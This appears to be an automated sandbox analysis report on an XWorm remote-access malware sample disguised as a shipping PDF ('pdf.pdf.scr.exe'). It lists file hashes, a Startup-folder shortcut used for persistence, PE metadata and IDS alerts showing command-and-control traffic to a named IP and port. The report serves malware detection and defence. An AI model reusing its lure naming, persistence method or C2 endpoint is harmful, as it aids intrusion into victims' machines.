C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i2k3jbs1.g1g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iykyorr3.3cb.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyq5ekke.w2l.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pqz4vs4g.ilf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qlhegpbf.ejq.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quqaejwr.03f.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t44uf1gc.dld.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytjs1ruy.w1v.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zibivij4.bkf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

Download File

Process:	C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Oct 8 08:28:39 2024, mtime=Tue Oct 8 08:28:39 2024, atime=Tue Oct 8 08:28:39 2024, length=512000, window=hide
Category:	dropped
Size (bytes):	765
Entropy (8bit):	5.061588949770585
Encrypted:	false
SSDEEP:	12:8pyju124fNpN88C3lsY//2H5xwJLemyEjACtVHk5x+W5mV:8pyKpfNI8IZ+jwFemyQACtaf9m
MD5:	B14DE0837D4710E0A57DCF4D793F1241
SHA1:	B48DD5C6E6649F4C0108DFC913004170E5A7A046
SHA-256:	6C84E87451184C3C0544F95CA1E45DAF48CC147388802AD416807B2350E3BD68
SHA-512:	9C453A211EA2D700AD13CCCCA62AC7A57A3734479C07728BEBFB784292A0BD37D35CCB4BB82F3BE304CE712D96D49718577164FF02540D0E95E8116D6BE5DD6E
Malicious:	false
Preview:	L..................F.... .....%ud.....%ud.....%ud...........................v.:..DG..Yr?.D..U..k0.&...&...... M.....oJ.cd.....-ud.......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlHY.K....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....HY.K..Roaming.@......DWSlHY.K....C.....................V...R.o.a.m.i.n.g.....b.2.....HY.K .XClient.exe.H......HY.KHY.K...........................j..X.C.l.i.e.n.t...e.x.e.......Z...............-.......Y............H.w.....C:\Users\user\AppData\Roaming\XClient.exe........\.....\.....\.....\.....\.X.C.l.i.e.n.t...e.x.e.`.......X.......358075...........hT..CrF.f4... .G.2=.b...,...W..hT..CrF.f4... .G.2=.b...,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Roaming\XClient.exe

Download File

Process:	C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	512000
Entropy (8bit):	7.6176668934989165
Encrypted:	false
SSDEEP:	12288:7nCrbrZvBBVcSAtt1jgS/kAlHn+qnPV7wAsIDmEdk:abr1XVcSAtt1jgFAZnjnPV7wb9Ed
MD5:	70566F5275EA7AC9FCA0EBD9C31BB101
SHA1:	6957D5F073CCF99C3A65563AD70D7FCA33839250
SHA-256:	5602833D8B536EDFBF979EB740F3345C291A68FC11F868DCA1BEF92F722420FA
SHA-512:	65D311095B0CFED8BCA49D8B8CA4AD10ADBE4276194B6C0F6F8018D4F59229D18452E31ADF51382FFAFFF5EA5E740D26DBE098869E86A9F5E055D3543A1E3B26
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16% Antivirus: Virustotal, Detection: 29%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...vl................0.................. ........@.. .......................@............@.....................................O............................ ..........p............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................b.......H........w..@V..........0................................................0............{.....+..B...}.....(.........0............{.....+..B...}.....(.........0...........(........A(........(.......}.....(....}......, .... ....(....}......! .... ....(....}......@ .... ....(....}......$ .... ....(....}.......}......(....k.(....k.{....k"...."....s....}..... .(...(......( ...o!.....("...o#.....r...p".. A.s$...o%......}......}....*....0............{........,...o&...(......o&...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.6176668934989165
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe
File size:	512'000 bytes
MD5:	70566f5275ea7ac9fca0ebd9c31bb101
SHA1:	6957d5f073ccf99c3a65563ad70d7fca33839250
SHA256:	5602833d8b536edfbf979eb740f3345c291a68fc11f868dca1bef92f722420fa
SHA512:	65d311095b0cfed8bca49d8b8ca4ad10adbe4276194b6c0f6f8018d4f59229d18452e31adf51382ffafff5ea5e740d26dbe098869e86a9f5e055d3543a1e3b26
SSDEEP:	12288:7nCrbrZvBBVcSAtt1jgS/kAlHn+qnPV7wAsIDmEdk:abr1XVcSAtt1jgFAZnjnPV7wb9Ed
TLSH:	59B4F16C2755D407C8AA6BB40E62F2B017794EEDA001E3079FD96CEBB97BF144C09293
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...vl................0.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x47e482
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xB1B46C76 [Sun Jun 22 20:17:58 2064 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7e42e	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x80000	0x5cc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x82000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x7bdc0	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7c488	0x7c600	d48440c5d263272b8cd68937ae3614b4	False	0.8790946922110553	data	7.628561188344063	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x80000	0x5cc	0x600	fc2d1aa2367a8d086cdfcb69272afab1	False	0.4270833333333333	data	4.129240874799537	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x82000	0xc	0x200	62d33df8909b206469693d45280d2b66	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x80090	0x33c	data			0.4311594202898551
RT_MANIFEST	0x803dc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-08T11:28:54.417357+0200	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:28:55.319169+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:28:55.319169+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:28:55.597433+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:28:55.601362+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:09.277703+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:09.279953+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:24.787453+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:24.791041+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:25.309226+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:25.309226+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:38.533244+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:38.535250+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:52.308168+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:52.310917+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:52.583064+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:52.584824+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:52.874212+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:53.058733+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:53.060251+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:55.307665+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:55.307665+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:58.707104+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:58.708780+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:58.947532+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:29:58.949192+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:59.199640+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:29:59.207987+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:09.067654+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:09.069812+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:14.247741+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:14.249438+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:14.487513+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:14.489380+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:17.577485+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:17.580130+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:24.769271+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:24.770766+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:25.018139+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:25.022215+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:25.257540+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:25.268298+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:25.497328+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:25.497328+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:39.540173+0200	2853193	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:39.637714+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:39.640700+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:39.878783+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:39.883250+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:40.417562+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:40.447920+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:41.067586+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:41.072707+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:41.337324+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:41.342401+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:55.308301+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:55.308301+0200	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:55.597512+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:55.602359+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:56.852862+0200	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	104.250.180.178	7061	192.168.2.5	49763	TCP
2024-10-08T11:30:56.864167+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:57.999989+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
2024-10-08T11:30:58.005043+0200	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.5	49763	104.250.180.178	7061	TCP
